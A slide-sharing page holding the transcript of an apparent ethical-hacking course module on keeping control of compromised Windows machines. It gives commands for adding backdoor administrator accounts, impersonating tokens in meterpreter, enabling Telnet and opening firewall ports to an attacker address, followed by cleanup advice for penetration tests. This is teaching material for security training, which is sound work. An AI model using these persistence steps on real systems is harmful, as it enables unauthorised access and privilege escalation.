Module 36 (Expanding Your Control of Windows Victims)

Slides:



Advertisements
Similar presentations
Litmus Learning Primer tests
Advertisements

Chapter One The Essence of UNIX.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Chapter 9: Troubleshooting and Repairing Networking.
11 ADMINISTERING MICROSOFT WINDOWS SERVER 2003 Chapter 2.
Microsoft Server 2008 R2 Group Policies & Network Policy and Access Services.
Remote Desktop Security Raghav Chawla, Jon Ussery Group 20.
COEN 252: Computer Forensics Router Investigation.
TCP/IP Tools Lesson 5. Objectives Skills/ConceptsObjective Domain Description Objective Domain Number Using basic TCP/IP commands Understanding TCP/IP3.6.
Printing Terminology. Requirements for Network Printing At least one computer to operate as the print server Sufficient RAM to process documents Sufficient.
11 SYSTEMS ADMINISTRATION AND TERMINAL SERVICES Chapter 12.
Remote access and file transfer Getting files on and off Bio-Linux.
Telnet/SSH: Connecting to Hosts Internet Technology1.
2440: 141 Web Site Administration Remote Web Server Access Tools Instructor: Enoch E. Damson.
Course 201 – Administration, Content Inspection and SSL VPN
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.
Cyber Patriot Training
Hands-On Microsoft Windows Server 2008
Penetration Testing Training Day Capture the Flag Training.
CSN08101 Digital Forensics Lecture 1B: Essential Linux and Caine Module Leader: Dr Gordon Russell Lecturers: Robert Ludwiniak.
VNC Greg Fankhanel Jessica Nunn Jennifer Romero. What is it? Stands for Virtual Network Computing It is remote control software which allows you to view.
INSTALLATION HANDS-ON. Page 2 About the Hands-On This hands-on section is structured in a way, that it allows you to work independently, but still giving.
Hour 7 The Application Layer 1. What Is the Application Layer? The Application layer is the top layer in TCP/IP's protocol suite Some of the components.
Module 4 : Installation Jong S. Bok
A Brief Documentation.  Provides basic information about connection, server, and client.
Computer Networking From LANs to WANs: Hardware, Software, and Security Chapter 13 FTP and Telnet.
CHAPTER 9 Sniffing.
Topics Network topology Virtual LAN Port scanners and utilities Packet sniffers Weak protocols Practical exercise.
1 Remote Access Telnet Telnet FTP FTP. 2 Applications and Communications Telnet Telnet  Program for accessing systems remotely.  Available on Windows.
Networking in Linux. ♦ Introduction A computer network is defined as a number of systems that are connected to each other and exchange information across.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
FTP File Transfer Protocol Graeme Strachan. Agenda  An Overview  A Demonstration  An Activity.
Core 3: Communication Systems. Network software includes the Network Operating Software (NOS) and also network based applications such as those running.
Lesson 12: Configuring Remote Management
XWN740 X-Windows Configuring and Using Remote Access (Chapter 13: Pages )‏
CNIT 124: Advanced Ethical Hacking Ch 13: Post Exploitation Part 2.
SQL SERVER 2008 Installation Guide A Step by Step Guide Prepared by Hassan Tariq.
Integrity Check As You Well Know, It Is A Violation Of Academic Integrity To Fake The Results On Any.
SSH. 2 SSH – Secure Shell SSH is a cryptographic protocol – Implemented in software originally for remote login applications – One most popular software.
INTERNET APPLICATIONS CPIT405 Install a web server and analyze packets.
Chapter 7: Using Network Clients The Complete Guide To Linux System Administration.
PostExploitation CIS 5930/4930 Offensive Computer Security Spring 2014.
COSC 432 Shi Li 12/8/2008. File Transfer Protocol (FTP) Used to transfer files and data between computers via internet Defined as RFC959 Developed in.
Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.
Windows 10 Common VPN Error Tech Support Number
Enumeration.
Working at a Small-to-Medium Business or ISP – Chapter 8
FIREWALL configuration in linux
LINUX ADMINISTRATION 1
Network Load Balancing
Metasploit a one-stop hack shop
XWN740 X-Windows Configuring and Using Remote Access
FTP - File Transfer Protocol
Logging into the linux machines
CIT 480: Securing Computer Systems
Introduction to Networking
Aplikasi Jaringan.
Lab 1 introduction, debrief
Telnet/SSH Connecting to Hosts Internet Technology.
Access Control Lists CCNA 2 v3 – Module 11
SSH SSH is “Secure SHell” Secure, compressed, widely supported, fast
Hardware Appliance Installation and Configuration
Web Application Penetration Testing ‘17
Cyber Operation and Penetration Testing Online Password Cracking Cliff Zou University of Central Florida.
Radoslaw Jedynak, PhD Poland, Technical University of Radom
Lecture9: Embedded Network Operating System: cisco IOS
Config Client Access (AS400)
Penetration Testing & Network Defense
MESSAGE ACCESS AGENT: POP AND IMAP
Lecture9: Embedded Network Operating System: cisco IOS
Presentation transcript:

Module 36 (Expanding Your Control of Windows Victims) At the end of this Module, you'll know how to add, delete, activate, and inactivate windows users from the command line. You'll know how to create local groups and add and remove users from them. You'll also know how to start, configure, and stop services and how to open and close firewall port connections for them. Module 36

Make Victims Work For You Once you've compromised a victim, you should make it work for you. If the machine is easily accessible to you that's good. You may want to create or manipulate users and local groups. Well-configured victim machines will be running few services. You need to get them to start services up for you to ease your task. Module 36

Users are Good. Add Them In a meterpreter session, you can execute the command shell to interact with the Windows command prompt See what users exist: net user Use the net command to add users: net user [username] [password] /add net user hax0r P@$$w0rd /add Make an inactive user active net user guest /active:yes or inactive net user Administrator /active no ?!?!?! Module 36

Groups are Good Use Them See what local groups are available net LocalGroup (If this fails to work, see the next page.) The TelnetClients group tells who can use telnet net LocalGroup TelnetClients /add net LocalGroup TelnetClients hax0r /add Other groups can be important too net LocalGroup Administrators hax0r /add Module 36

If net localgroup Doesn't Work... Your meterpreter may be running as NT AUTHORITY\SYSTEM. Check by executing getuid If running net localgroup yields a 1312 error do this in the meterpreter use incognito impersonate_token “NT AUTHORITY\\NETWORK SERVICE” Then run a shell and net localgroup should work for you. Module 36

Services that Might Be Useful Telnet SSH VNC Remote Desktop Module 36

How Do You Start/Stop a Service? For greatest control, use sc.exe (Service Control?) Support comprehensive control of services Start Stop Query Configure Module 36

How to Enable Telnet Service See if its already running sc query tlntsvr Configure telnet to start on demand sc config tlntsvr start= demand Start the service up! sc start tlntsvr Open a firewall connection netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = [AttackerIPAddress] Module 36

When You Are Through, Clean Up! Any changes you make to a system break the security model of your client. This may introduce vulnerabilities that can be exploited by other attackers. Before completing your penetration test: If you start any services, stop them If you open any firewall ports, close them If you create any files, remove them. If you add any groups delete them If you add any users delete them Module 36

Clean Up For Our Example sc tlntsvr stop netsh firewall delete portopening protocol = TCP port = 23 net LocalGroup TelnetClients /del net user hax0r /del Module 36